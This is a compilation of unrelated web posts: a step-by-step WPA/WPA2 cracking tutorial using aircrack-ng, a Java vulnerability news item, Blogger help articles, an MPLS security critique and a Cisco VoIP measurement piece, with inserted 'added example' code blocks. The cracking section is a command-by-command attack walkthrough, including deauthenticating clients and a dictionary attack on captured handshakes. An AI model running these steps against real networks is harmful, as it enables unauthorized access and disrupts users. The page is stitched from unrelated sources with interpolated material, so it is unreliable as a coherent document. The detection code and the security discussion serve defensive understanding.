
How To Crack A WPA Key With Aircrack-ng




With the increase in popularity of wireless networks and mobile computing, an overall understanding of common security issues has become not only relevant, but very necessary for both home users and IT professionals alike. This article is aimed at illustrating current security flaws in WPA/WPA2. Successfully cracking a wireless network assumes some basic familiarity with networking principles and terminology. To successfully crack WPA/WPA2, you first need to be able to set your wireless network card in "monitor" mode to passively capture packets without being associated with a network. One of the best free utilities for monitoring wireless traffic and cracking WPA-PSK/WPA2 keys is the aircrack-ng suite, which we will use throughout this article. It has both Linux and Windows versions (provided your network card is supported under Windows).

The network adapter I am going to use for WPA/WPA2 cracking is an Alfa AWUS036H; the operating system is BackTrack 5 R2.

Step 1 : Setting up your network device 

To capture network traffic without being associated with an access point, we need to set the wireless network card in monitor mode. To do that, type:
Command # iwconfig (to find all wireless network interfaces and their status)


Command # airmon-ng start wlan0 (to set in monitor mode, you may have to substitute wlan0 for your own interface name)


Step 2 : Reconnaissance

This step assumes you've already set your wireless network interface in monitor mode. It can be checked by executing the iwconfig command. Next step is finding available wireless networks, and choosing your target:

Command # airodump-ng mon0 (monitors all channels, listing available access points and associated clients within range)


Step 3 : Capturing Packets

To capture data into a file, we use the airodump-ng tool again, with some additional switches to target a specific AP and channel. Assuming our monitor interface is mon0, and we want to capture packets on channel 1 into capture files with the prefix data:

Command # airodump-ng -c 1 --bssid AP_MAC -w data mon0 (where AP_MAC is the MAC address of the target access point)


Step 4 : De-Authentication Technique 

To successfully crack a WPA-PSK network, you first need a capture file containing handshake data. You may also try to deauthenticate an associated client to speed up this process of capturing a handshake, using:

Command # aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0 (where MAC_AP is the MAC address of the access point and MAC_Client is the MAC address of an associated client)


So, now we have successfully acquired a WPA handshake.


Step 5 : Cracking WPA/WPA2

Once you have captured a four-way handshake, you also need a large, relevant dictionary file (commonly known as a wordlist) containing common passphrases.

Command # aircrack-ng -w wordlist capture_file.cap (where wordlist is your dictionary file, and capture_file.cap is a capture file containing a valid WPA handshake)



Capturing what you need to crack WPA-PSK and WPA2-PSK requires only a handshake. After that, the offline dictionary attack on that handshake takes much longer, and will only succeed with weak passphrases and good dictionary files.
Cracking WPA/WPA2 usually takes many hours, testing tens of millions of possible keys for the chance to stumble on a combination of common numerals or dictionary words. Still, a weak, short, common, or human-readable passphrase can be broken within a few minutes using an offline dictionary attack.
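The deauthentication step above is also the noisiest part of the procedure from the network's point of view: an access point normally sends at most an occasional deauthentication frame, so a tight burst of them addressed to one client is a usable wireless-IDS signal. The block below is an added example, not code from the original article, showing that detection over a constructed summary of monitor-mode frames; the record layout, the one-second window and the threshold of three frames are assumptions chosen for the illustration.

```python
"""Detect deauthentication floods in a summary of monitor-mode 802.11 frames.

Added example, not part of the original article. It assumes the capture has
already been reduced to one record per management frame: (timestamp in
seconds, frame subtype, source MAC, destination MAC). The sample records,
window and threshold below are constructed assumptions.
"""
from collections import defaultdict, deque

AP = "00:11:22:33:44:55"        # constructed BSSID
CLIENT_A = "aa:bb:cc:dd:ee:01"  # constructed station addresses
CLIENT_B = "aa:bb:cc:dd:ee:02"
BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed sample: normal beacons, one isolated deauth (an AP may send a
# single one when it drops an idle station), then a tight burst of deauth
# frames carrying the AP's address as source and aimed at CLIENT_B.
SAMPLE_FRAMES = [
    (0.00, "beacon", AP, BROADCAST),
    (0.10, "beacon", AP, BROADCAST),
    (0.15, "deauth", AP, CLIENT_A),
    (0.20, "beacon", AP, BROADCAST),
    (5.00, "deauth", AP, CLIENT_B),
    (5.01, "deauth", AP, CLIENT_B),
    (5.02, "deauth", AP, CLIENT_B),
    (5.03, "deauth", AP, CLIENT_B),
    (5.04, "deauth", AP, CLIENT_B),
    (5.30, "beacon", AP, BROADCAST),
]


def detect_deauth_flood(frames, window_s=1.0, threshold=3):
    """Flag (src, dst) pairs that carry more than `threshold` deauth or
    disassoc frames inside any sliding window of `window_s` seconds.

    Returns a list of alert dicts, one per flagged pair, with the count and
    time span of the burst as last observed.
    """
    recent = defaultdict(deque)   # (src, dst) -> timestamps still inside the window
    alerts = {}                   # (src, dst) -> alert dict
    for ts, subtype, src, dst in sorted(frames):
        if subtype not in ("deauth", "disassoc"):
            continue
        q = recent[(src, dst)]
        q.append(ts)
        while ts - q[0] > window_s:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) > threshold:
            alerts[(src, dst)] = {
                "src": src, "dst": dst, "count": len(q),
                "first_ts": q[0], "last_ts": ts,
            }
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_deauth_flood(SAMPLE_FRAMES):
        print(f"deauth burst: {alert['src']} -> {alert['dst']} "
              f"({alert['count']} frames between {alert['first_ts']:.2f}s "
              f"and {alert['last_ts']:.2f}s)")
```

The single deauthentication to CLIENT_A is left alone, while the burst to CLIENT_B is reported once with its final count. Because the source address in such frames is whatever the sender chose to put there, the detector keys on the burst pattern rather than trusting the address; on a real network the window and threshold should be tuned against the access point's observed baseline.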

About The Author 

Shaharyar Shafiq is pursuing a Bachelor's degree in Computer Engineering at Hamdard University. He has completed the C|PTE (Certified Penetration Testing Engineering) certification and is interested in network penetration testing and forensics.

Java Hits Another Roadblock - Found To Be A Threat For Browsers




Java has been the most talked about application in the past couple of months. Not because of its functionality but due to its inability to refrain from being attacked and exploited. Oracle has released emergency security patches to deal with the vulnerabilities in Java but to no avail. Java has been attacked over and over again by free-rollers and experts alike using various tactics.


According to a report, about 100 million PCs are vulnerable to various attacks leading to unauthorized access through Java's unstable software. As if things weren't bad enough for the software already, the Department of Homeland Security issued a warning to all PC users to disable Java on their systems.

Experts at Websense decided to do a little research on the topic, coming up with a list of Java vulnerabilities, the versions affected, and so on.


According to Websense:

It is probably no surprise that the largest single exploited vulnerability is the most recent one, with a vulnerable population of browsers at 93.77%. That's what the bad guys do: examine your security controls and find the easiest way to bypass them. Grabbing a copy of the latest version of Cool and using a pre-packaged exploit is a pretty low bar to go after such a large population of vulnerable browsers.


Most browsers are vulnerable to a much broader array of well-known Java holes, with over 75% using versions that are at least six months old, nearly two-thirds being more than a year out of date, and more than 50% of browsers are greater than two years behind the times with respect to Java vulnerabilities. And don't forget that if you're not on version 7 (which is 78.86% of you), Oracle won't be sending you any more updates even if new vulnerabilities are uncovered.

Cheers!

About the Author:
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

The LightBox Image Display Option Stopped Working, Recently

Last week, the popular display option, Lightbox, used for showing full size images in Blogger blogs, stopped working.

Anxious blog owners reported that full size images are now being displayed in a normal browser window, with the browser back arrow required to return to the blog display - instead of the elegant black background overlay with the mysterious "X" which closes the overlay. The problem appears to affect all images in the blogs affected.

An immediate sampling of the forum problem reports suggested that it's likely that all Blogger blogs are affected. Since not all blogs may contain enough images, and be owned by people who are attentive enough, we are not seeing massive volumes of problem reports.

We did open a rollup discussion, in Blogger Help Forum: Something Is Broken, where we are gathering a good sample of the blogs involved. To date, no obvious affinity has been discovered, in the over 100 responses posted.

Today, we have a mysterious suggestion, posted in a forum discussion, which may provide a workaround for the problem.

We are advised to add a brief snippet of code to the template.

<script src='http://www.blogger.com/static/v1/jsbin/2321381434-lbx__fr.js' type='text/javascript'></script>

The snippet in question is added to the very end of the template, using the "Edit HTML" option in the dashboard Template wizard, after </body> and before </html>, so the last lines of the template read:
</script>
</body>
<script src='http://www.blogger.com/static/v1/jsbin/2321381434-lbx__fr.js' type='text/javascript'></script>
</html>

I added this snippet of code to the template for this blog. I don't use a lot of images in this blog - but you may examine one previous post, where you will find a picture. If you click on that one picture, you will see the full size image displayed in Lightbox format - which was not the case, earlier today.

The code snippet in question is hosted in "blogger.com", so it should be safe. And, it's not difficult to add - or to remove. That said, I have no idea if it may conflict with other code - so anything is possible. It is marginally more reliable than third party code.

I've done no further testing of this fix, so I'll await your feedback. You may comment here - or in the rollup discussion.

When You Setup A Custom Domain, Please Know And Observe Your Limits Of Expertise

Too many blog owners, when they setup a custom domain for their blog, do not consider the details.

We see signs of the problem, too often, in Blogger Help Forum: Something Is Broken.
Can someone give me step by step instructions for setting up a custom domain with xxxxxxx registrar? I contacted xxxxxxx customer service - and they told me a lot of things I didn't understand! Would it be easier just to transfer the domain to GoDaddy?

The short answer here would be
Yes, it would be easier just to transfer the domain to GoDaddy.
Unfortunately, that answer is not completely correct - and the correction may leave you with a broken domain.

Too many blog owners, eager to setup a non BlogSpot URL for their blog, do not consider the details involved, when they bypass "Buy a domain".

Part of the blame, for this problem, has to fall onto Blogger's head. People using "Buy a domain", for their first domain purchase, see the domain purchase as such a simple process. They never become aware of the complexities involved in a domain purchase, until they setup their second domain, and decide to "roll their own".

Let's look at the levels of experience needed.
  • Beginner: Use "Buy a domain".
  • Intermediate: Use the Google Apps or Google Wallet wizard - or alternately, buy a domain from one of the 8 identified registrars.
  • Advanced: Buy a domain, directly, from any of the thousands of registrars, worldwide.


As of 2013 June, "Buy a domain" is not offered, as part of "Add a custom domain" - although blog owners, in the USA, may use Google Domains. This will leave people outside the USA with one option - "Advanced".
Beginner blog owners are strongly advised to use "Buy a domain". Choose an available domain, provide payment details, and your domain is setup. Wait until Transition expires, and get to work referring your readers, search engines, and other Internet services, to your new, non BlogSpot URL.

Intermediate blog owners, able to understand simple instructions, should be able to use the wizards provided by Google Apps or Google Wallet. Alternately, Blogger provides reasonably complete and simple instructions for setting up a domain with the 8 most popular registrars.

Advanced blog owners are free to choose any registrar, of the thousands out there. But beware! You are on your own, when you do this.
So choose your registrar according to your needs - and according to your skill level. Don't start a custom domain project, before verifying that your experience is complete. Make the right choice, before you sign on the dotted line.

If You Comment On Blogs Extensively, You Should Consider Using Google 2-Step Verification

One recently identified cause of deleted Blogger blogs appears to involve brute force hacking against our Blogger / Google accounts.

We've known, for some time, about blog owners receiving alerts about "suspicious" / "unusual" account activity. The alerts frequently involve locked or deleted Blogger / Google accounts - and generally include the owner having to change their password, solve a CAPTCHA, and / or provide their phone number (mobile or home phone) to login.

Later, people started reporting that their blogs were being deleted - possibly as a result of having to change their password, solve a CAPTCHA, and / or provide their phone number.

I've been observing - and blocking - an annoying style of comment based spam, which I have termed "nice blog" spam, for some time.
Nice blog. I will keep visiting this blog very often.
This style of spam, from what I can tell, has been published by the millions, in various blog comments, on both Blogger and non Blogger platforms.

The reason for the spam always intrigued me. Observing that the spam was published in the millions, suggested to me that it had a special purpose, intended by its creators. Looking at a typical spam message, in my email (since I moderate before publishing), I could see no consistent type of content.
  • Some messages would contain links, others not.
  • Some messages would mention what looked like commercial products, other references were obviously imaginary targets.
  • Some messages would appear to be mere babble.

Recently, I discovered one strong possibility for the purpose of the spam - a very ingenious form of email address mining. The spam comment is only needed to allow a hacker to subscribe to a given comment stream, using the "Email follow-up comments to ..." option. It's possible that the subscription is not even affected by moderation - whether the blog owner is moderating, either before or after the comment is published to the blog, the hacker remains subscribed to the comment stream.

All that the hacker / spammer has to do is to publish a spam comment, select the "Email follow-up comments to ..." option, and watch while his Inbox fills up with subsequent comments from other Blogger / Google / OpenID account owners. Any comment containing an email address, and linking to a Blogger blog, would go straight into the hacker's database.

Later, the hacker could go to work against the Blogger accounts referenced in the comments. In some cases, this would result in successfully hijacked Blogger blogs, which would become part of a spammer's blog farm where advertisements of various natures could be hosted. Valuable blogs, with established reader populations, could also be used to serve malware (and more hacking) to unsuspecting readers.

The demographics of some hijacking attacks provide interesting clues. In one episode, we had a significant number of home / personal / small business blogs that had been hijacked by one specific individual. Many of the victim blogs
  • Contained details relevant to the owners, which provided clues to passwords used by the owners.
  • Were owned by people who used commenting extensively, for networking both with friends, and with business targets.
  • Were read (and commented upon) by similar people, who similarly provided password clues in their own blogs.

Having been part of the restore process, both with people who had their blogs hijacked, and who had their accounts locked and blogs deleted, I observed that the former (hijacked blogs) seem to have decreased in volume as the latter (accounts and blogs locked / deleted) increased in volume. I don't think that the relationship is coincidental - or spurious.

My opinion is that the locking of Blogger / Google accounts - and subsequent deletion of blogs - directly results from detected attacks against the accounts in question ("suspicious" / "unusual" activity). Noting that the attacks seem to be more common to people who comment on blogs as a form of networking, it appears that commenting can lead to accounts and blogs being locked or deleted, as Google protects us against hacking.

Considering this possible cause and effect relationship, Google 2-step verification is a good idea. Click here, for Google instructions on setting up 2-step verification.

Use of 2-step verification helps safeguard our accounts against brute force hacking. This will help anybody who is anxious about accounts and blogs being deleted or locked, as a result of "suspicious" / "unusual" activity. If you own a blog which is subject to this threat, you should consider using 2-step verification.

The sanity (heart attack, ulcer) that is saved may be your own.


Stats Displays Pageviews - Not Unique Visitors

Too many blog owners do not understand the unique capability of Stats - nor do they understand its limitations.

We see the periodic question in Blogger Help Forum: How Do I?.
How do I find out how many actual people are viewing my blog?
Stats does not provide unique visitor counts - Stats provides pageview counts.

It's simply not possible to determine, with 100% certainty, how many different people are viewing your blog.

Consider these environments, where multiple locations, or people, are involved.
  • A single person can use multiple computers, simultaneously.
  • A single person can use a mobile computer, moving from one cellular connection to another.
  • Multiple people can view the same computer, simultaneously.
  • Multiple people can share the same computer, serially.
  • Multiple people can share the same Internet connection, serially.

There are other visitor meters besides Stats - and some other such products will provide "unique" visitor counts. Each product, which claims to provide "unique" visitor counts, will do so based upon specific limitations and techniques.

One of the most obvious ways to determine unique visitors is by comparing IP addresses. Surely, two pageviews from the same IP address will be one person - and two pageviews from two different IP addresses will be two people, right? Wrong.
  • One person can use two computers, simultaneously.
  • One person can use a mobile computer, moving between two locations (each location will have a different IP address).
  • Two people can use the same computer, at a library or Internet cafe.
  • Two people can use the same mobile Internet connection.
In each of these cases, one person may look like two people - or two people can look like one person.

It's even possible that two people can access the same page, from the same computer, one after the other. If the first person does not properly clear the computer, after use, the second page access will be from cache - and will not access the server. The second person, using that computer, will not show up in a Stats log. Again, two people can look like one.

Some visitor logs will drop cookies onto a computer. Detecting a cookie already in place, this indicates one person, returning - and successfully dropping a cookie, indicates a different person, right? Wrong, again.
  • Again, a shared computer is a possibility.
  • Not all computer owners will permit unknown websites to drop cookies, onto their computers.
  • And some owners, when they permit cookies on their computers, will periodically clear cookies.

Some very sophisticated visitor logs can compare demographic details, similar to the Stats Audience display. Besides IP address, what can be determined?
  • Operating system, brand, model, and version.
  • Browser brand, model, and version.
  • Maybe, location (possibly determined by IP address, again).

And finally, some visitor logs will compare IP address, over a given time interval. Arbitrarily deciding that all activity from the same IP address, over a period of 30 minutes, represents a statistical "single person", is a known technique. This is not a legally significant technique, however.

The bottom line is, as I state repeatedly, you simply cannot compare numbers from any two visitor logs or meters, with any degree of usefulness. Each product will have its own way of determining unique visitors - when they even suggest a "unique" visitor count. Stats simply avoids the uncertainty, and only provides pageview counts.
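The 30-minute IP window described above is the one "unique visitor" technique on this page that can be written down exactly, and doing so shows concretely why the three numbers disagree. The block below is an added example, not part of the original post or of Blogger Stats; it parses a constructed log in common log format and counts raw pageviews, distinct IP addresses, and 30-minute sessions per IP (a new session starts after more than 30 minutes of inactivity from that address, which is an assumption about how the window is applied).

```python
"""Pageviews vs. unique IPs vs. 30-minute IP sessions for a visitor log.

Added example, not code from the original post or from Blogger Stats. The log
lines are constructed; the inactivity rule (a gap of more than 30 minutes from
the same IP starts a new session) is an assumption.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in common log format: one reader fetches three pages
# over 50 minutes; a second reader (different IP) reloads one page twice.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jun/2013:09:00:00 +0000] "GET /2013/06/post.html HTTP/1.1" 200 5120
203.0.113.5 - - [10/Jun/2013:09:10:00 +0000] "GET /2013/05/older.html HTTP/1.1" 200 4096
203.0.113.5 - - [10/Jun/2013:09:50:00 +0000] "GET /2013/06/post.html HTTP/1.1" 200 5120
198.51.100.7 - - [10/Jun/2013:09:05:00 +0000] "GET /2013/06/post.html HTTP/1.1" 200 5120
198.51.100.7 - - [10/Jun/2013:09:06:00 +0000] "GET /2013/06/post.html HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_log(text):
    """Return a list of (ip, timestamp) hits, skipping lines that do not parse."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits.append((m.group("ip"), datetime.strptime(m.group("ts"), TS_FMT)))
    return hits


def count_visitors(hits, session_gap=timedelta(minutes=30)):
    """Count pageviews, distinct IPs, and per-IP sessions split on inactivity."""
    by_ip = defaultdict(list)
    for ip, ts in hits:
        by_ip[ip].append(ts)

    sessions = 0
    for times in by_ip.values():
        times.sort()
        sessions += 1                      # first hit from this IP opens a session
        for prev, cur in zip(times, times[1:]):
            if cur - prev > session_gap:   # long silence: treat as a new visit
                sessions += 1

    return {
        "pageviews": len(hits),
        "unique_ips": len(by_ip),
        "sessions_30min": sessions,
    }


if __name__ == "__main__":
    print(count_visitors(parse_log(SAMPLE_LOG)))
```

On the sample this yields 5 pageviews, 2 unique IPs and 3 sessions: the first address is counted twice because its third request arrives 40 minutes after its second. Swap the shared-computer or mobile-roaming situations from the list above into the log and the same code will happily merge two people or split one, which is the point the post makes about every such heuristic.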


If You Use CAPTCHA Screening On Your Blog, Try Publishing A Comment, As A Guest

Not all Blogger blog owners, using CAPTCHA screening to reduce abusive comments on their blogs, know first hand what the typical CAPTCHA puzzle can be like.

We're seeing a few concerned blog owners, in Blogger Help Forum: Something Is Broken, asking why they're seeing fewer comments on their blogs.
I'm hearing from people that they can't post comments on my blog. I tested, and comments are working just fine. What is the problem, here?

Not all blog owners bother to test the CAPTCHA, on their blogs - or even know why they don't see one, when commenting.

Not all blog owners, enabling Word verification in their blog commenting settings, bother to read the tool tip behind the "?".
Show word verification
This will require people leaving comments on your blog to complete a word verification step, which will help reduce comment spam. Learn more.
Blog authors will not see word verification for comments.
The simple advice
Blog authors will not see word verification for comments.
does not sink in, to everybody.

This leaves many blog owners unaware of how frustrating it may be, for their guests to comment, on their blogs.

If you're a blog owner, musing whether to add word verification to your blog, in an effort to cut down on the spamming and trolling going on in many blog comment threads, maybe you should try posting on your blog, as a guest. With "Show word verification" set to "Yes", logout from Blogger - or clear cache, cookies, and sessions (yes, all 3!) - then restart the browser, and try leaving a comment on your blog.

What you discover may not please you. Then ask yourself how many of your readers will have the patience, to solve a CAPTCHA, every time they wish to publish a comment?

As a blog owner, you have 3 settings which are used, in proper combination, to provide a safe environment for your readers to leave comments.
  1. Authentication.
  2. CAPTCHA Screening.
  3. Moderation.
Consider using one or both of the other two options, if possible.


Renaming Your Blog Requires Choosing An Available Blog Name

Like creating a blog, the task of renaming your blog involves one very important step - choosing an available blog name.

When you rename your blog - as in change the blog address - you have to pick a name (address) that's not in use. Both creating a blog, and renaming a blog, suffer from one key detail - you can't identify an available address before you get started.

When you create, or rename, a blog, you can only get to the task at hand, and start with the best choice.

Like "Create a blog", you'll only find out about an available URL after you have successfully chosen that URL for your blog. Unlike "Create a blog", the Blog Address wizard does not verify availability in real time.
  1. Paste or type the desired blog name (Only the "yyyyyyy" in "yyyyyyy.blogspot.com").
  2. Hit Save.
  3. If the name was available, you'll be looking at the initial Blog Address display, with the new address "yyyyyyy.blogspot.com" identified - and "yyyyyyy" will now be unavailable.
  4. If the name is not available, you'll get the sad news
    Subdomain: yyyyyyy is not available.
    And now, go back to Step #1, and try again.

If you want to do the rename with the least stress, you make a list of possible choices before you start, and sort the list in decreasing preference. Decide which names you like the most, before you start. Then start the above process with Step #1, and your top choice. If you end at Step #4, pick the next choice in the list, and go to Step #1, again.

As with "Create a blog", you should plan to go through your list as promptly as possible. Hesitate too long, when making the next choice, and your alternate choices could be unavailable.

If your choice of name will affect design work on the existing blog, yet you wish to change the blog design before renaming the blog, setup a stub blog - and pick the best available name for the stub blog, now. Once that's done, make the necessary design changes on your current blog - then swap names between the stub blog and your current blog. You'll likely use the stub blog, later.

As with creating a new blog, please note that addresses previously taken will not be reissued to you by Blogger - a 10 year old blog remains valid, whether published once daily for 10 years, or once 10 years ago and never again.

And as soon as you get the new name successfully chosen, be prepared to continue the renaming process, as promptly as possible.


Is MPLS Network Really Secure? MPLS truth revealed against security.


There is a common misconception that MPLS provides some level of security.

The truth is that MPLS offers:

• No protection against misconfiguration - Human and machine errors as well as OS bugs can result in MPLS traffic being misrouted.

• No protection from attacks within the core - MPLS is vulnerable to all the traditional WAN attack vectors.

• No protection or detection of sniffing/snooping - It is impossible to detect if someone is siphoning or replicating data - there is no “alarm” that goes off if data is being stolen.

• No Data Security - The data is left in the clear and can be accessed, replicated, or used by anyone who gains access to it.


The illustration above shows the components of an MPLS header. Note the absence of any security measures within the header itself.

• The Label Value provides forwarding information used by the routers.
• Traffic Class (TC) bits are used to provide services such as traffic prioritization.
• The Stacking bit (S) allows multiple labels to be used.
• TTL is a “time to live” marker to allow packets to expire.

None of these mechanisms provide security.


Also note that the original IP packet is unchanged, which means that with MPLS your data traverses a shared network in the clear.
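Walking the header fields listed above in code makes the point concrete: all 32 bits of a label stack entry are spent on Label, TC, S and TTL, and the bytes after the bottom-of-stack entry are the IP packet exactly as the sender built it. The block below is an added example, not part of the original article; the frame it parses is constructed (two labels over a minimal IPv4/UDP datagram), and the label, TC and TTL values are arbitrary.

```python
"""Parse an MPLS label stack and expose the unmodified IP packet beneath it.

Added example, not from the original article. It builds a constructed frame
(two MPLS labels over a minimal IPv4/UDP datagram) and walks the 32-bit label
stack entries: 20-bit Label, 3-bit TC, 1-bit S (bottom of stack), 8-bit TTL.
"""
import struct


def build_label(label, tc, s, ttl):
    """Encode one 32-bit MPLS label stack entry (RFC 3032 layout)."""
    assert 0 <= label < 2**20 and 0 <= tc < 8 and s in (0, 1) and 0 <= ttl < 256
    return struct.pack(">I", (label << 12) | (tc << 9) | (s << 8) | ttl)


def parse_mpls(frame):
    """Return ([(label, tc, s, ttl), ...], payload) for an MPLS-encapsulated frame.

    Entries are read until one has the S bit set; everything after it is the
    encapsulated packet. Raises ValueError if the stack is truncated.
    """
    labels = []
    offset = 0
    while True:
        if offset + 4 > len(frame):
            raise ValueError("truncated label stack")
        (word,) = struct.unpack(">I", frame[offset:offset + 4])
        entry = (
            (word >> 12) & 0xFFFFF,   # Label: forwarding information only
            (word >> 9) & 0x7,        # TC: class of service
            (word >> 8) & 0x1,        # S: bottom of stack
            word & 0xFF,              # TTL
        )
        labels.append(entry)
        offset += 4
        if entry[2] == 1:
            break
    return labels, frame[offset:]


def build_sample_frame():
    """Constructed sample: two labels over a minimal IPv4/UDP datagram that
    carries a readable application payload (addresses and content invented)."""
    app = b"ACCOUNT=1234;PIN=9876"
    udp_len = 8 + len(app)
    udp = struct.pack(">HHHH", 40000, 5060, udp_len, 0) + app
    ip = struct.pack(">BBHHHBBH4s4s",
                     0x45, 0, 20 + udp_len, 0, 0, 64, 17, 0,
                     bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2])) + udp
    return build_label(16, 5, 0, 64) + build_label(74565, 0, 1, 63) + ip


def payload_is_cleartext_ipv4(payload):
    """True when the bytes below the label stack start with an IPv4 header."""
    return len(payload) >= 20 and payload[0] >> 4 == 4


if __name__ == "__main__":
    labels, payload = parse_mpls(build_sample_frame())
    for label, tc, s, ttl in labels:
        print(f"label={label} tc={tc} s={s} ttl={ttl}")
    print("payload is plain IPv4:", payload_is_cleartext_ipv4(payload))
    print("application bytes:", payload[28:])
```

Nothing in the parser needs a key, a checksum over the payload, or any authentication field, because the format has none; anyone positioned on the shared core with a copy of the frame can run the same four lines of bit arithmetic and read the datagram. Confidentiality and integrity have to come from an overlay (IPsec, TLS) carried inside the MPLS payload.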

Hackers and Data Thieves know better!

There are papers and video tutorials readily available on the Internet that provide a “cook book” approach to sniffing and redirecting MPLS traffic. Here’s what Black Hat had to say about MPLS security claims:

Providers say: Traffic streams are kept separate.
Hackers know: The mechanism used to separate traffic can also be used to identify targets of interest!

Providers say: There are controls around provisioning and management.
Hackers know: Provisioning and management are to data security what traffic lights are to bank robbers - they do not prevent data theft!

Providers say: There are gateways between the Internet and the MPLS network.
Hackers know: Traffic is not accidentally leaking out to the Internet, it is being stolen right off the MPLS backbone!

Providers say: They use Netflow/J-Flow to identify "malicious activity".
Hackers know: Post-event notification is not a substitute for prevention!

Why You Need to Measure Delay, Jitter and Packet Loss on Data Networks



With the emergence of new applications such as voice and video on data networks, it is becoming increasingly important for network managers to accurately predict the impact of these new applications on the network. Not long ago, you could allocate bandwidth to applications and allow them to adapt to the bursty nature of traffic flows. Unfortunately, that’s no longer true because today applications such as voice and video are more susceptible to changes in the transmission characteristics of data networks. Therefore, network managers must be completely aware of network characteristics such as delay, jitter, and packet loss, and how these characteristics affect applications.

Why You Need to Measure Delay, Jitter and Packet Loss

To meet today’s business priorities and ensure user satisfaction and usage, IT groups and service providers are moving toward availability and performance commitments by IP application service levels or IP service-level agreements (SLAs).

Prior to deploying an IP service, network managers must first determine how well the network is working, second, deploy the service, such as voice over IP (VoIP), and finally, verify that the service levels are working correctly, which is required to optimize the service deployment. IP SLAs can help meet life-cycle requirements for managing IP services. To ensure the successful implementation of VoIP applications, you first need to understand current traffic characteristics of the network. Measuring jitter, delay, and packet loss and verifying classes of service (CoS) before deployment of new applications can aid in the correct redesign and configuration of traffic prioritization and buffering parameters in data network equipment.

This article discusses methods for measuring delay, jitter, and packet loss on data networks using features in the Cisco IOS® Software and Cisco routers.

Delay is the time it takes voice to travel from one point to another in the network. You can measure delay in one direction or round trip. One-way delay calculations require added infrastructure such as Network Time Protocol (NTP) and clock synchronization and reference clocks. NTP is deployed to synchronize router clocks and also when global positioning system (GPS) or another trusted reference time is needed in the network. Accuracy of clocks and clock drift affect the accuracy of one-way delay measurements. VoIP can typically tolerate delays of up to approximately 150 ms one way before the quality of a call is unacceptable to most users.

Jitter is the variation in delay over time from point to point. If the delay of transmissions varies too widely in a VoIP call, the call quality is greatly degraded. The amount of jitter that is tolerable on the network is affected by the depth of the jitter buffer on the network equipment in the voice path. When more jitter buffer is available, the network is more able to reduce the effects of the jitter for the benefit of users, but a buffer that is too big increases the overall gap between two packets. One-way jitter measurement is possible and does not require clock synchronization between the measurement routers.


Packet loss severely degrades voice applications and occurs when packets along the data path are lost.

Measuring Network Performance

Key capabilities in the Cisco IOS Software can help you determine baseline values for VoIP application performance on the data network. The ability to gather data in real time and on demand makes it feasible for IT groups and service providers to create or verify SLAs for IP applications; baseline values can then be used to substantiate an IP SLA for VoIP.
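The three quantities just defined are straightforward to compute once a probe stream has been captured with sequence numbers and timestamps. The block below is an added example, not code from the article or from Cisco IOS; it works on a constructed stream modelled on the jitter operation's fixed 20 ms spacing, assumes synchronised sender and receiver clocks for the one-way delay figures (the requirement the article notes), reports jitter both as the mean absolute interarrival variation and as the RFC 3550 smoothed estimator, and checks the delay against the 150 ms one-way bound quoted above.

```python
"""Compute one-way delay, jitter and packet loss for a sequence-numbered probe stream.

Added example, not from the original article or Cisco's software. Records are
(seq, send_ms, recv_ms); the sample is constructed, with 20 ms sender spacing
and one probe (seq 5) that never arrives. send_ms and recv_ms are assumed to
come from synchronised clocks, as one-way delay measurement requires.
"""

SAMPLE_STREAM = [
    (1, 0, 40), (2, 20, 62), (3, 40, 79), (4, 60, 100),
    (6, 100, 145), (7, 120, 160), (8, 140, 181), (9, 160, 199), (10, 180, 220),
]
EXPECTED_PACKETS = 10
VOIP_MAX_ONE_WAY_DELAY_MS = 150   # one-way bound quoted in the article


def analyse_stream(stream, expected_packets):
    """Return delay, jitter and loss statistics for the received probes."""
    stream = sorted(stream)
    delays = [recv - send for _, send, recv in stream]

    # Interarrival variation between consecutive received probes:
    # D(i-1,i) = (R_i - R_{i-1}) - (S_i - S_{i-1}); zero on a perfectly steady path.
    variations = [(r1 - r0) - (s1 - s0)
                  for (_, s0, r0), (_, s1, r1) in zip(stream, stream[1:])]

    # RFC 3550 smoothed interarrival jitter estimator: J += (|D| - J) / 16.
    rfc3550_jitter = 0.0
    for d in variations:
        rfc3550_jitter += (abs(d) - rfc3550_jitter) / 16

    # Loss from gaps in the sequence numbers actually received.
    received = {seq for seq, _, _ in stream}
    lost = sorted(set(range(1, expected_packets + 1)) - received)

    return {
        "delay_min_ms": min(delays),
        "delay_avg_ms": sum(delays) / len(delays),
        "delay_max_ms": max(delays),
        "delay_within_voip_bound": max(delays) <= VOIP_MAX_ONE_WAY_DELAY_MS,
        "jitter_mean_abs_ms": sum(abs(d) for d in variations) / len(variations),
        "jitter_rfc3550_ms": rfc3550_jitter,
        "lost_sequences": lost,
        "loss_percent": 100.0 * len(lost) / expected_packets,
    }


if __name__ == "__main__":
    for key, value in analyse_stream(SAMPLE_STREAM, EXPECTED_PACKETS).items():
        print(f"{key}: {value}")
```

The mean absolute variation answers "how far does the spacing wander"; the RFC 3550 form is the running estimate a VoIP endpoint actually carries, and it settles well below the raw figure because it is a 1/16 exponential average. Loss is computed from sequence gaps rather than from a count of arrivals, which also makes reordering visible if the input is not sorted first.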

Cisco IOS Service Assurance Agent (SAA) technology is a component of an IP SLA solution, together with the Round Trip Time Monitor (RTTMON) MIB, which enable the testing and collection of delay, jitter, and packet loss measurement statistics. Active monitoring with traffic generation is used for edge-to-edge measurements in the network to monitor the network performance. You can use the CiscoWorks Internetwork Performance Monitor (IPM) network management application or the IOS command-line interface (CLI) to configure and retrieve data from the RTTMON MIB, or choose from a wide selection of Cisco ecosystem partners and public domain software to configure and retrieve the data. In addition, the CiscoWorks IPM features are now also available in the WAN Performance Utility (WPU) module of CiscoWorks IP Telephony Environment Monitor (ITEM) network management software.

Is Your Network Ready for Voice?

